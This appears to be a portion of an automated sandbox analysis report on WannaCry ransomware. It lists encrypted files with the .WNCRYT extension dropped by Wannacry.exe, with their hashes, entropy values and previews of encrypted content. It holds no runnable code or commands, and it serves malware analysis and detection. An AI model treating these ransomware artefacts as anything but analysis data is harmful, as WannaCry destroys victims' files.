Category:	dropped
Size (bytes):	872
Entropy (8bit):	7.758964338853338
Encrypted:	false
SSDEEP:	24:bkXU/6CP6hKVn7tvl5VjXhccHPTjJIETg/:bkQ6gyKV7tjVlccHPXJIEo
MD5:	3AB80228C689D429734E0405C1523C6B
SHA1:	B49A17AA46440CEB466188D5478C466EC0C567BC
SHA-256:	C87D0B7E57594ADCEFD1CD974AA1DFC6F8B7D84C9AA5B6F3A10F8B5397C1C6C9
SHA-512:	EA90A6A38B0AB871883FAE10C262662CA17A5F7B49BD2F2584C5A2FD6FE9BBA403C09EA4D65A09CD30FBB1BCEB2206A16CAFA205FF9067E971E6E6C75E55762D
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.....Z......\0.W..'.....xm...A}. ...Uc...@...OK..h+.R.....q...0L.`,..S.v.\.....O..{e....._"..pp+...P.T9..=.>.....I.b.iq..a..$a..5.(......J.x?&...3@5.r...lx..{.&..)?B..)...%$..6.%.......b..G.p....o....'T.......(...Q..?.CF..D.7...o6..f..I.m....'......T1y....C.......:......P"....A..y.,....-.y.n..w.....).Z.-.r3.Zrm.8^y/..............[.t...g..h.H...I9../.+dI._M..{...c.R.E..Y........i..V../bY..C...w52zan....Y.,..io...zL.h.3`.?....r.Q.:..;.....z.p...'....'.......g..+_....!Y.e..J_.......].5k....c..h...{l.;.W.0p_....K.}..u?....X......~w.vN.....R'3.........T........_.....5.?..5.}iM.<.W/2Z.%.d..Z.....X...&.......n.>.._..^aZ..M........j.M>.....w.t.J./...`.....,2....Z........}q.$.....k..>...Db..t!Pa.@&..c.U,pF.>.{.....s..N.l..P..-Y.d......^EN.E....3i<sTm...)...j.T9.&...1...Q~...#.T..d....o"..T.....b."y.B.cc.+.

C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState\DiagOutputDir\OneConnect.DiscoveryNotificationTask05_25_14_44_39_3196.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	872
Entropy (8bit):	7.746459938409857
Encrypted:	false
SSDEEP:	12:bkEskM2iCZ9q3YjP36KXNQlS2tOiOvq/bXXnoVRRNkQ0eZ0p79jjvIoMVdVO:bkdkkCZ9IY7IS1EXXnoBNkQr2pRvT+w
MD5:	38FE8E9BAC283F71D6205F439125B229
SHA1:	3DD1D445F82FC79C11FDEC74B8AAA05CEED2F6F8
SHA-256:	1216B8E1FDAE2A8C181735A7135F02E8DFB425622EBF3473F3BD8DEB56CF51CF
SHA-512:	E678F7D881A5166734ABC5A188E477267EA8C3BC5D0F559A1C7588039A3B842424FA892239BDEF6B55B6C32A0F3CDBBAED718E2BAA7F9E16F6FEBBAFC6DD19AF
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.....P...../.Kfz6...u..#....o.W..z`..^tx..N.%u.f.>.oc.......K..$....A..\.=w..........TZ%.cc.}.c.d...d...9/..........>Bz.\|.i.>s..o..:..P.:.FR...1\|r...y+2.f._..GT..V?.Q......<S.....}p.....~.?..?-.d.?.........u-.....w...m...\|..83bR...E.+.}.`....C........W.P....O....k.@....FyN.R...td.Q....UL!.....U.d...x@~/.././........X.,\...G2=$..k`.k...D1..4.:...e........X.P,..,....{&...B...>...f.4........F\.].Ka...... . r........Y&.&a8._}l[{h.PH.{.y...s.3..YTi%......hN...W/..I.0<.`..SqcK....p....S.SiQ/..C:.z..N\d4...i2....Y\...........+...R4)...n.3....g.;..t.a.;.k...N..s..<T......u.7...K.!R.i..vn5.!....t.oUJ.B....W=.2.~.o...2.4N.M...VW.g%...N$.R...>.....+..rF_/ .HN%.T..c.1%..}L...........4\|.k=....T^s).D...a.$...\../.....%...).BZ.]kx9'.5M..x...n..j...g.k....NQ.-.2....&....=.=..,mQ.........H*&..od....yU+..6yQC4W0yq......l.T>!.

C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState\DiagOutputDir\OneConnect.DiscoveryNotificationTask05_30_09_46_46_6814.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	872
Entropy (8bit):	7.74919367722879
Encrypted:	false
SSDEEP:	24:bkcpAWESMYo501nwY+F3p2K0jH/ltIpIChHnHbkCT7:bkcpAWhhoK1nfmp2vT/H+Pnb13
MD5:	B599A6567F74B05BF07DF36EA0DBFEF5
SHA1:	6B0AE42DB01012C7F2CBAB9ACA439AF9516D9B86
SHA-256:	B90C33B6BDA72D4B05CA4A41BDFD2355E308F9CEDDE46FBC2508B7AB13ECF7D5
SHA-512:	89FCCC2FC54C7E21D8910D49AE9B9C4340F0FFA54C44A5BCD627FDD38C491F25A074AFCCC4E0DD332CB50C98F94EEC3AA25114AFD7AECDDEE121F3804DBF858B
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....'..I$._.....]'..&.d..{.aF$.......1R.4}....2.j.....!......g.?...>...45...>.Hv.<..e^..3.]..'t...%5#bA..#...Z.{.y.............YQ.F..1E..?ak%=......]mb.F..6-HU.2zTy.....ql.\L,\|mT.t..Os.....1.V..........sLS..l..,...v.\|......b.WA.$.Z...t1.9.....C........Y6..rF 1".Z..k...<(...k.../.y`BU..(.6.`.C....:g.X...`^...R.2pu....6^..2F.0....".#..h.Y.q..k,..mA.\Y..L.".pxZ.C,.a.......!......W...../....i7...._1.B........7.{.%r..D.:D%eo...).pTD.>.......p.y..A.%025....zE<.....6...P!@....\..=U....y'.\.&.8.3.68O5@K[..<....Y....?......?v....&..Q.K.m......x&!.6.E.......T@..(.{.(`}O.Dc.Nd\.a.:4...jTL...O..m......b.P"..C.:.Z._pg.r.AM.K.PGO...%S(w.....h.....D.I..s.;.s......KC`...l...T......q......9.>.Ui..n..@.-m..J0l...V..i.....ow..r.......>....ct...cO/...<.....)...K.$D..K.r.%.p5mm]....h....$..SF....{.,?..*0A.y../g.@.z..g.

C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState\DiagOutputDir\OneConnect.DiscoveryNotificationTask08_05_19_44_36_6781.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	872
Entropy (8bit):	7.74589908031009
Encrypted:	false
SSDEEP:	24:bkJOTR3K1RdswqJKI34TLTb0tofYDAi4A8cWtbMR:bkQRK1RdLq9AHsFDADUOMR
MD5:	3C6D60FE807F6E9244D5CF42CE03B367
SHA1:	46929ABBBF6181058110AF22530F9B95F9AAC111
SHA-256:	0C2FFCBB21EF2280AD658DA8B495630018EED8D1DD542B63F6160A2B662B8841
SHA-512:	E4F20C853F2EF93C5FEAE35EE08FD1986E163074CAC832D85987793AEB1C9EC97331665833597B4E94F984726357E1439821FDF7B3CB432CCEABBCC75CD867A2
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....e\|.n......N.!.{..,.>..v..Aw....'C!..].......Z.C+...=.=.b.H#.c.#D..%...u...~..x.P........(.h..f.xT...%.>..H.RzHa*........(p(>\|............,{.1{.!.\|....z5&..M...C.!1:1.....wZ?'.f.k. P"..n..6..d:0.H.(.Z,U.O~..].....WO..A..._./N%.'.b..k..q..M#.....C........o...P....?;;.\....L.59i.....X.@t.w.....e7#&^.J9.f.....2j..kq...\. v...#j.G.u..[......_(...].F_.R.......z.s..O.!.....Z..7.^.hI. ......5s.@l...pZ!./...kB..vA...d.A.}"..h.d.....@o...S..b...r.HA......K..N...F..........V@..+oiE-..=p.7..#......?......3.2..ir..~.#.99EF/M.......S....9.....+H.2.C$.Ay..d.TL,.iy.D.../.....7T7H.L$2...KB..j,...>.R.\|.....lD5..i.../.b.....>O.`Py.h...K.m?.!..].!...sI..I.1.]m.X...~.[...@.0YU....,..V.J"........Fu...9.......4}....7..j.<T......t..I..8].Z;mH.....<&.RB....E.!2..j..Oj..\|......i.RZ.Nb..6U.......{V.:5.......>.R(..{...[^.

C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState\DiagOutputDir\OneConnect.DiscoveryNotificationTask08_18_15_05_51_5411.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1576
Entropy (8bit):	7.8587199757966655
Encrypted:	false
SSDEEP:	48:bkQkiBvTz38g2qtUeP9FEyNqPYw/E0c8jiQ0WCjVLYKlAibohHO:oQkgzseP9FEHsKjiU8LeisO
MD5:	D4BD5C516892E150E89EAFA6F1911348
SHA1:	C97A2CE4E0EC58B4E2B95FE2C03B8319E694DC25
SHA-256:	8B1983B5D98059929804205619CF64E819343F8563616BF76E9B65CB6AEBE979
SHA-512:	A84867E28603AD88A620D43605FB31CC521696E59EA1D732C11F0A7732EC7FCC28013C8A0C5AE9E48B3F4CA8CACDB2A1BF7786BF52ADDE15FB3F3E239BA99A24
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!......v.'.v..<....H.?..j'......e.......7.._......b..wY...Dd.o\/m.o...........hz%.Y....Y.@......"..a...X.....N.dVss...IQL......9......yCl....3.?1..r.^.?...8..T_M.G8.p.c...F..s.m.......Vsi..C.".x\s..w.BT.....o..Z.Z....p. ...$=HS..KN.~.!p-.}...................' ..j<....V.o..NCq..\|.a.......m2E.=^/....s.-.o..$Y.ubK....;.....:;....d.....D.{fn.W........T.},H..F.6....E.[\.f..E"f.?.+6..+'...]....3.Ae.b.+C1{.<pMm.....R..&._...i}7t,.....>....X.....=.b#.....8...G...V.+.....QpD......P}.}.\|=..:..8.,/W..l\|LG'h.._]../.J..y.9ex.C"K..J..m0D..t.k..gq..v..R,.l....\|KO0........B[.J...[.G....K?j,W.<.'D..U...v...........}.........+..4....Y..D...7.......H.hB._-.2.}.).uZ.MD.G@.,$..H2...>X..V...Z.].i..6..R.yw....2...b]..o..5;...G.b..Zo..v.T0..w.K.o.K}."...D...CW.%t.h.t.....CP.{,... .}.&4.VT]iH.9.........F.g..KOa.i..0.>.N!.....,.5X\......na..pl&..[.Up...Z..`..U..)..kxU.\|l...q+.m..6...<z..Gq.o..4./.?...<8..d...e..3l}.....#_..K.cE.z..%^.....S.j.gk

C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState\DiagOutputDir\OneConnect.DiscoveryNotificationTask08_18_15_37_00_4351.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1576
Entropy (8bit):	7.855826292907235
Encrypted:	false
SSDEEP:	48:bkk9KBgKdz5dK9l2LzQg6htfUZFJI5dwF:oKCg0zb3UzrcZFW5dwF
MD5:	305DBAE47C06878D8D3896F045B659AC
SHA1:	4722D06C66CCE52FFE09F4008228DAA054A481E7
SHA-256:	A1B5A0C2B1C7BB12C482F9A74FC813194E6E260C1FE83A30E3D83A4E380AD658
SHA-512:	18D38687BE202820DE926B756125FCDBDA073A00D06125EFF3F2972B29F9D6CF145BFFA5F2B82E25994C45CEDA3FA6E982C286A0977E2FAA518A149A1AD35041
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.....B..H....6.P......k.M".I..5}.'~....../q..-....l.!.v."U.7-...az%..N.,k\|.....9\m.T+F.%......u.Io......<.'..f...N.].8E.Cc.LIl.vh..,..5..E.m.H2.>...[.[..EEZ...k..=.O..IRH'j+p..cL....j..!.....TJb..........,..../. +.."...D.<.e+.}F...........MPem).`.................j.`...2 x"....=..5%.,.w}_5f.c;z{..q.L..!O.L.).N...\.-pB...:..2t...s...#f....C&..r..7."LD..y]]D......>.uk..c...>..2."...j...F.5...{f.5. ........-;..}..C..O..)....N..<...L.i.U..;...8.%....P../..L.zB.A[......Z..:nGT.".M...idhUu....O.p.I.)a..A.z..v.....F..1Fs.M.._i....\|.b.CQ.............EqH.KN4..>&.....H.......7..j @.SyLg..FZh.Zu.\l.5..!.v.........Sr.y.......Cct...08\.F.,sbzR.Wg....r.,_I4...1.,.,$K..]#..w&Bw..t...T6c.JZh......wX...a..\..).Q.....[.QSCquA...P..W..%O..].+!..8:....h.[...o..$b...i.U..r...pW.N$.Z........E~+.....I..b~....)..Z7.. ..;w..w>..i.`0......s.........}....e.....-.a]....{...K..l..M$..+! ...K.o.X...9<K.lp_...3u.n,.0)..L.ob..x..%..0SeA`\.CH..b...8P

C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState\DiagOutputDir\OneConnect.DiscoveryNotificationTask08_26_11_08_10_4195.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	872
Entropy (8bit):	7.77418066919019
Encrypted:	false
SSDEEP:	24:bkUx2qyA6H+GXC1T4jc9BUwGij+SmwoPQfX:bkUx7l2tXC1xT+SmJM
MD5:	1B45AE4D29698967056785EE94A5464B
SHA1:	91822FF0C4BE3F251AC652348494371B1CFFA4A2
SHA-256:	D88D3598C7E6135D14D100C7CDD16B2497FA7C658D34C27881E2B88E2D2310AB
SHA-512:	ECE04FBD05FED508E3983EA646CB392EBF9525EAF65DEC7B1BB9EBD2F1B36DD48A2FC37B8BB3518A7E0E7AA28F0810EE113C39488BECCC64259E43EB42637988
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!............NeX;1.......Y......B.....LQ.y{.....i..+8...,v..\|..W....@E..'';%..N.WP....}...Mz.........wd....p.=..z..1O.28...e..3........@.E.G..W0...n.4.3B .T............U.:..'.s.f.a....V.o.<..=7.L..c........4.i.2.....U.ZL.... z.....q...f/j.......C.......M........OkA.._.,.8h...g...7o..3.%O.{Du.`..?......u..J.6.!......R.~_Q.}..:.Hg.D.rM.^.Z.....6...Q.j..v.Xu3....w`.~...#T..7@......Xb...P0."....nT..-.-.<.>b.!`.).vd......V...y<.:.JE.g..l.....b<?.O...J.A.....{.;.....Ib.mC..9..d5.,..@.,....2.A?.A.x..Qj..VE...U..J.'.0......Zo.%<G....."]........b.hd...(.7V.U.T..;>.w-.s......t...m.@\|gCQY....S...aq.Eo'_.. \|....!Qu.\|.~..._...g.........,.W.FC. ...&.p.J."......@?)..l.......t.O,...\....w%.....aN~cz.......^%K.9..H]K.<..2.l'Hs..lzi.%...e!+....EC-.3.8....b...s.)+......?:eG1......p...9.RzNz/...S./....8...C....,..

C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState\DiagOutputDir\OneConnect.DiscoveryNotificationTask09_03_00_44_01_9156.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	872
Entropy (8bit):	7.781621262993053
Encrypted:	false
SSDEEP:	24:bkSp8+VJDiWhAHyBiCPAJObTD8xb9TMhasR9Cu46IbKZYFW:bkzUDtAHAXiYasR9t3cKZWW
MD5:	457571B71D004964D90909954B7994DC
SHA1:	3C4CE08BBB2BA79FBB334B0FD17AC7409FE1B47A
SHA-256:	8119EF621A104F8DE59CDAC4CE6930C1EEFF6C4DD60F68799A8E677959224099
SHA-512:	E2AE73C02B0CFCFB57128B0F9CEF269169184A403DB61897ADE288D4CEBB0CE7FB5A32AABC757DAE5A741091A4678AC408FC41367A4ABEF8FBBB75B6E96622D6
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.........61e!....".c#...%.....36.5......?....:.....f%...c....b.y...f.c}..,.,.8.....z.u.>.]O.a..@;=. 5@....38.......r..U.J..A.x.+,..U..........0.U...H.e...V.JE.(.T..."...!....md..,..q..<.._.&.B}.[n.s.Z..hk..(...!Na...I...s....A.....e.~..S.........C.........6MS .W....i.Sy..g0.P=c...Y....Y.?.......4.3<..^l\|A.&x....m6..]j.........A.'.....)..B.p..0?...nr..&.+D.4..;...L..!]pL.3......V..(....d..x...W.D.K..\.3B...S'.T.l..&.\D. ..&.N..L.......eY.@7.`V.`A.O.....@.B-......uU..Y#tn...F.?...S..v.7....Zy&d....m.g......w..9.^....d.Q......'..h.C.0#.}~4.q7.V.X.q...X5.......;O..w.J.....6..#.] {......^_.Ul....\....^m...v_..x.n D.z\|...~...L..=-......M.<P.G.wDH.-.!.............b...D{.......>..<......PQG.. ..[.c.......u..p.$.S.....N..G.T2.N.>\|"..J5K5.QU.e.\FYGb)..+...~...k_....h....\|1c^f2.:!.P.}...Q.......&r...2.H./.P.

C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState\DiagOutputDir\OneConnect.DiscoveryNotificationTask09_14_09_37_22_0506.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	872
Entropy (8bit):	7.726779594993882
Encrypted:	false
SSDEEP:	24:bktKyjOc/5DdemDU1UYj4xvHeUeIyIeZTr1ZGPc:bkcyjd/J1gUfx25jIMTd
MD5:	D289BF517B3887057485B0D5057B3EBB
SHA1:	5704EA9932A1E4BAAE5E080359D3774FD860EC20
SHA-256:	91779C0939257FEA461D96822D0FB236A3D0EF9E55E10FD62AD884389BD171EB
SHA-512:	C7085F40EEE8B98B5959F04058D32EA0865D8657F0FBD2C28BB057BA4699A893150A3CD515C1AE14C81B7C98A2EE8D66A4E81BC5F8F68ACD55138DC4C4FDBE43
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.....q`.<;f..0...0y.....zpp..,..^/2....h&..aI..B`'...7\|...2_.a..}...G....:....;y}Vb5:....nK..N7q.A.r.l...W.rT...3.ry:..1.=^Sw....d.....vP.!+.K.....w3.. .t..B".{%..........^..H..J..f2^....._....?.p...6...m.H.C.U.....FH..$.h..jP.\|.../..+>.........C........>4.}t...n.\.f...tjkQZ..R.g.mj...mS. .<YB.;..].P.$v6@x.g..D..]..5(..d..UC.IJ.W>.^........d\|......T/.W....o3.j].G...TP...f.i[v,.6.)Y......-#...KL..O.....v....`DP..\|R.k.g^.F0.n.C_.As.M.L...^`I...p..Y.Bn..w..[......$................m<..............!MB.....VmUxS.Q.3.......s2.+..<.Xf...&/.......L+.\|..........b.4...>...@.D.%u..Llb#_..........8........ Md$.+..E..4k.+LD.r.S...S...k.[i0a..L...FK...\...U.Fv/...7.p..0.v}..<cm..m.7v.r.cM..;:.f...n..jp<E.+..Yb^...)L.s...P.w....4..:D......S/...........sc...q...H...6p.\|.....d.A..#e.D..LQ....2$`a.?#.{]...,........S@.[.G..

C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState\DiagOutputDir\OneConnect.DiscoveryNotificationTask09_22_11_18_56_1666.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	872
Entropy (8bit):	7.756497490345144
Encrypted:	false
SSDEEP:	24:bkrwDnjcmmWxp7FKvJ6jyg1SSk5+v5fyx/OrL5Jnt19aRh9:bk8DXJxph0WDv5WOrdJnL9aL9
MD5:	7B038D1DA53B7E0C50758DDC07790C00
SHA1:	02ED70ECDB176E56B8A3153B06C64AE9A986D1C8
SHA-256:	72DA42D396B57430DCE721879A6FB6D5814E39EA946490289F64AFB59030B0AD
SHA-512:	E423DA6AAF5CC25CA157D558E483DD5F3208852C1BE3AFD7985E76B027AEE91E81931874B08217E7F96752C0D13D06C507A10A677CAF1AE4D92D3E313085026D
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.....O..-.......O.,2.z+.....>.."...1.`.`.>.Lq.B...gy...lg.8...'$XL...JL...rh..O_.....g.~.C.<m......W.d.Z..</...^3?k....FU...f'.>O.J.!..8..i]./.....-..j....dd Co..Q.d......=n.8w..n]g..}0.....Hf.Z?Aw.Rx..0.._...L?.^.!]$&./.,RL.t.z.....s.,....C.......iI.E?.Z-.d....iTj;./...]+...J]l.,\|...2...'h...?.G.pb.......1..S......q..#.....O..W..>.y......=.Z.2.(.a?ch.N......jR-.f....-?\..i\K]h...;...>.1I..3R...........zK.4W..y]6..a?8.........".guP..a'...r.iPPq...?.lp.K.!..4....EQ..L.0..<....4....^...o.^...m.#....DmN.:(.._.~).l.o............d.....9,nc....Q.n..).na-..3>.>...P.3..`..C.+%-m.sr...z.....Xo>.w......M..............3l"4..9?.........(....P=.L@d..\|."fuI...!.v..<.......r..gS*.._...;....>..=.\|....A;.l."........=.2<..x.....4..i.E5..?8.....<...c>....C..L.>.N.\.....x......[...s..4.. ..T...D......}..\|.rl.W.y.z

C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState\DiagOutputDir\OneConnect.DiscoveryNotificationTask09_30_13_13_40_5442.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	872
Entropy (8bit):	7.732664684072035
Encrypted:	false
SSDEEP:	12:bkEbaLfD5lruNxZk7nCMqpHYZtoUZrE8TXsyrVwzPE/qDmtqaUZOHOoMK78bzyDu:bkqcfD5xSTkJoU57XjruQqabu8EyWT
MD5:	879957DC2828B9B1F585166A932ADEB9
SHA1:	A1C91B028D15FB633021DA25050440BECA37F0BA
SHA-256:	24B8CC60D679EC86752BC58227F7BF65CB3AD9638B3E4F550E8122C7980D79BC
SHA-512:	3EFC0311DC9C6A517BF5AAAC13862EEB77C059CF3453828761F40CB1608A662F77CD920AC503528F17D778DF7C3ADD195D76FF753CAE9E0D70B5662761B3AC71
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.....Xw.9..N......W.lL..n.s....E$...r..gT..C... ....Ks_C..z...Zh............j..e.>..g...\X..8.M...Lw.&.Rl..tg..V...T@.....`..oH.......F}........7-.\l.h".d........."%../.....8..[<..C.o.p.J.M...[..%#..<.`..z.(B.......<.......+[.....5=..F.I..W........C........u...X.'r.t....H.....%..P....O.;...:.d..>d....Z[.\."....cd..)NF......=(...1..O.`._...N%y....?8r.q..7ST......%+..e.WAEQ 9..ydhi.o.P<..{...F..V.e,}.C..R{...>.h..}....@..I.[.......G...=8.....a.X....#.c....?..#......U.GB.76v..e.WI.1vd.....<....\|d...K..l...Im.A`o...%..6.ks.e..Ic....i....2..o.g....1...1_/...#0..K.h...q.geU.jY.e$`..}.."K._@X4L_..N_......qk...[...3q..x.t=.p.^.,....M..`.w0.,..}....v....>..\\..A..\..9.Cx....i\|O...?,.....Pys(.l...h(.N.x..{.....iq.Gh..s]yi.r...._;.#J....~x.l...._T.Q....][.+9..p......w./..O.c.......R..)r..v..1......{.5!..q.nj.....2..A.~.. ..

C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState\DiagOutputDir\OneConnect.PostInstallationTask08_05_16_21_23_8984.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1256
Entropy (8bit):	7.838962442881056
Encrypted:	false
SSDEEP:	24:bkSZiw8t8r2z7E5WGKIeLGbQiqjx0aeQZz4MM7LEilC1zXWvEsOtYGB:bkCMqE7E5WGRbQiqjemEL7LPCB9rtY0
MD5:	B48D1E4FA1C1698E72725FABF60F3111
SHA1:	C00FE54E5B3D5B5F1CC0697135CD8436F2878E2E
SHA-256:	4B042A9539723B770A149D2E87AE2DBC9CB33BEB07725968556305C4CDE99B74
SHA-512:	6B2AE53656205358C9505307FCD534D5900119CEC2FCD09A7FD384099569C818AB38BD984DAF8C784441A436E18ED0C03ADF35A36671E0CAECFD41C8CA916386
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.....R#.....c(w9..P.&..0H\|a...6X.."....+vA....J.@...:.j......F&.D..bV9...".+.}+....bpj.O..Z^.....T.....h..\|f.rnw.d.......S`.Q......[.ME....t7..^....`\<....";mz.]..K.../3.YU.F".l.\~,.E.l........5.\N>..bB.tj.[q.F...-D..yk.(.].r:.(..~...^n.>u.U;...{............B...O......C..7>....a.s....(.=..`L`....=..;Z.O.W.,.......]o.....ms..h...Ka.F......^"=m.....\|...?..q.AQr.5...D._...y.8...p.\|&0..TF:....8.d....i..P...f!..`.Z@0..x..>.s..%Yx...h+...1.op.C.....d..u.^ .m.%j.K..E............O..qS.G......d].2.q....P...D.....\|....F.#.[M.Fl..~).U[..f..T...d.)..w.'.>..KW...S..}..h......O.q....`:U..f#;.,i..:0E.:...W....`...I....".].....k.v.D....+...Om.g.G.B.t.N...@......l.'........R.$.$.U..a.......Ie.....'75..\|.x zEd.`.f...!.mA...L.=.l76Jp..8..a..t....F.#{.O\|+.f.......z..q....I.~....ti.....9.....S.'6.g.y....1.2...W..[....w....G]......o\|....@...`N.'....7}.6.2...B.0...I..l.....CP.r...O..S&X.+.`1~...E...A.5.=....X.{S.G-=g..k.n.(.7J.....'k.S.A...I...E.\...h.k+.

C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState\DiagOutputDir\OneConnect.PostInstallationTask08_17_13_19_38_8611.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1880
Entropy (8bit):	7.888320797181919
Encrypted:	false
SSDEEP:	48:bk3/dcU+NImgBiTMyu4o52//8plKOY/UstsyfCl5/:oP2Ry/BiTYa0lKOYc4sR/
MD5:	635D18258F96B37CA16E8AE31C937408
SHA1:	26A0F578E027089E2079FFD512FD179B68A6B657
SHA-256:	74793C2CDC1DCA937D7A5A94CCAA30D8CD477309EA686251EF12C7FB6AEC645F
SHA-512:	EB6152329E8A1087599E10FCBAEC65D81F5EEDB4927417EFC970CBE856808A21C15575BE1B65325D7C556FBC5627240B98CDF0FD29B013A87107B0A4FB0207B6
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....,_.....~UWf)t;..]}.w..fP.#rD.k...Z..^mR......6..4...0..y.^vx.u..A..n..9.p.\d.'N...C...j.@P.......8..S..`.....-@.W.P..>...B)ecl$...4.s7.{..J,.aFy..v....1g.e;\.t...;....1Q...%.a....-..u. ...PV}gsp...9u.(.:n(a.n.g...SL.....NaW.#.. h.....Ig......5........_.....N......y.0...w.t.'.!y.D._..+. ).ym'P\y..%~/./.0R..`., ....P...M.. L.. +nF.P..4@).y.pD.cxa..8.$.f3..Gz.p!4q;c.H.}1..y../..g.5........"./..^(..]....&Hp"R8O.\|c....t.........sX3.e.6.....^.^...F.B.K.ls...DB.H.V.P8PW..KzV.3E..o..j^zM...v...Z..y..m...A....Y..z.\...O.6H..7.H..;t...g....!M....1..a.5..Uz5......+:C.M..}!%. ......v.>TC..?....?..l....v.......u{B./ok[...<..I.L.6Th...mQ..0fW..r...O%.w..}..e.....ft.=Q...'..I.cCjW,6...$2/r..8..`.....t....\./.T.u.2.}G:.... {..c.....A{.6.w$.}GU...U....:..Z.SR.8..R=.\|....,.....Vz...L.6g.t8.Z,...p.b.. x<.+..$.-yp....G....9.q4..N........%....].t...,.(......?a.....t......)e.dh.?........e._..J..........[H...Y.\1...P{..#...J:2i+.Z]..%..L...s.N....\.J

C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState\DiagOutputDir\OneConnect.PostInstallationTask08_17_13_50_48_4321.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1944
Entropy (8bit):	7.8889793603725655
Encrypted:	false
SSDEEP:	48:bkk2qlcpVHAyRl40fEL6vPHVoT8coEVbZKEev+I6S:oacvgIla4vEVb5ev+S
MD5:	FB08C74D23793E8893D508E50C19F37C
SHA1:	29C114D870AF62B6BB86640DBFE4E623007D7E44
SHA-256:	E90A658DB4FD8FFA97794A2169B210CAA448443C4CA7C90789F4EF2BD36CA7E0
SHA-512:	2CA00C181177304109E69CCE38AE9DC9BDAC52136A8CF62643CD7AF48721D4584F56681F0FE66D31AE7D5DC68CD262D1DAA2851C3752149F199725B81E550ADB
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....q.....Rr..'=..w...J..O.Y_..Y.G<.:...[..3.u/..n.{......V......1.J.!.....w.=.d..........%..[.O...UX.'&."\|...&....'xR,?..Y......#..,..'.&`8;.O./sQt.......I...).`&.&.q..e.........v.....t4s.^..P....b..n......T.R......S_.h..]\1+.......J.S.N...q+.dy......s.............-T....[.q.#A......{.DW.....0..7..(.p....YDD.9.%6-..o.H.8...e..t..a..gR... 0..wM.5"X..%3.\..._.(.K.^...Fm.@Dt.}.._.....^~.w....6..P..#k.6......{...\|Q......A.b..'..K....NS?...."_=\.5..BP.D.>>.c....&.8...Bz}....w.%Br....p....>...y.\|b.f...8$.`G....y.&ma;.;f#h.u...A...#...H..?..Z.FB..!Bv....=K.+16........r.4.)...>....Y... ..........d...e..1....44]..Y}X, .px7A.y..P{.J.G..uI....>...../.k."..K.mqH...J..Z..#..b]R....P...-d%.o"D.?....U.!...}.v..\|..&..^....H..m..{x?....3t.m...d..Xi.T...KxlXM..".j.wN..i.PT....C.;.....M..!p<.W.i.vv..]..!P.\..$.\...A...F..i...E.......pq\.5<!..-.Uw..~....%O1.h....bw.......+..\|..a..~.%c...d......q$..8...:.v..jD9..wy..O...Z.8.....=.E...A...<..6?..r.w<<.

C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState\DiagOutputDir\OneConnect.PostInstallationTask08_18_17_07_25_4954.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1576
Entropy (8bit):	7.879335948082946
Encrypted:	false
SSDEEP:	24:bkol1+kIdqccnfNQqUKzHy0naQG8QzPxF6CntU933nnBeFxFt1Wxvfg8BBs:bkoX9IdqtfNTpzHy0ZKPG3nBIbt1k5s
